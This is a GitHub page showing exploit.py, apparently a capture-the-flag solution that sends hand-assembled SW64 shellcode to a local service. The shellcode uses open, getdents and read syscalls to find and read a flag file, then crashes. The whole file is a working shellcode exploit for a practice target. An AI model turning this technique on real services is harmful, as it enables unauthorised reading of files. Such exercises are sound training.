-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathexploit.py
More file actions
72 lines (67 loc) · 2.62 KB
/
exploit.py
File metadata and controls
72 lines (67 loc) · 2.62 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
from pwn import *
from sw64 import *
break_code = bytes([0x00,0x00,0x10,125])
def send_payload(p, payload):
p.recvuntil(b"(0 to use the builtin):")
p.sendline(str(len(payload)).encode())
p.recvuntil(b"of shellcode: ", timeout=1)
p.send(payload)
return p.clean(timeout=1).decode()
def attempt(payload):
with remote("localhost", 5000) as p:
return send_payload(p, payload)
syscall_no_open = 45
syscall_no_getdents = 305
syscall_no_read = 3
if __name__ == "__main__":
data_offset = 0x100
payload = b""
#Open /
payload += ldq(v0, t12, data_offset) #syscall_open
payload += ldq(a0, t12, data_offset+0x8)
payload += add(a0, t12, a0)
payload += mov(a1, zero_reg)
payload += syscall_0()
# Dirent
payload += mov(a0, v0) # Move fd to a0
payload += mov(a1, sp) # Move sp to a1
payload += ldq(a2, t12, data_offset+0x28) # load 200 into a2
payload += ldq(v0, t12, data_offset+0x20) # load syscall_get_dents into v0
payload += syscall_0() # getdents(2, sp, 200)
offset = 48+16 # Worked out through experimentation
# Overwrite prepend / to flag filename
payload += ldq(t0, sp, offset+0) # Load data one byte before flag filename into t0
payload += ldq(t1, t12, data_offset+0x30) # Load data containing the difference into t1
payload += add(t0, t1, t0) # Add to t0 to effectively prepend /
payload += stq(t0, sp, offset) # Write data back to buffer
# Open /flag-foo-bar-baz-lorem-ipsum
payload += ldq(t1, t12, data_offset+0x38) #Load offset inside sp into t1
payload += add(a0, sp, t1) #Set a0 to sp+t1
payload += mov(a1, zero_reg) #Set a1 to 0, O_RDONLY
payload += ldq(v0, t12, data_offset) #syscall_open
payload += syscall_0()
#read flag
payload += mov(a0, v0) # Move new fd into a0
payload += mov(a1, sp) # Move sp into a1
payload += ldq(a2, t12, data_offset+0x28) # move 200 into a2
payload += ldq(v0, t12, data_offset+0x40) # move syscall# of read into v0
payload += syscall_0() #syscall_read
# Read flag into registers and crash
payload += ldq(t0, sp, 0)
payload += ldq(t1, sp, 8)
payload += ldq(t2, sp, 16)
payload += ldq(t3, sp, 24)
payload += break_code
#data padding
payload += b"\x00"*(data_offset-len(payload))
#data
payload += p64(syscall_no_open)
payload += p64(0x118) #string offset #0x8
payload += p64(0x0) #open flags #0x10
payload += b"/"+b"\x00"*7 #0x18
payload += p64(syscall_no_getdents)#0x20
payload += p64(200) #0x28
payload += p64(0x2f00-0x0040) #0x30
payload += p64(48+17)
payload += p64(syscall_no_read)#0x40
print(attempt(payload))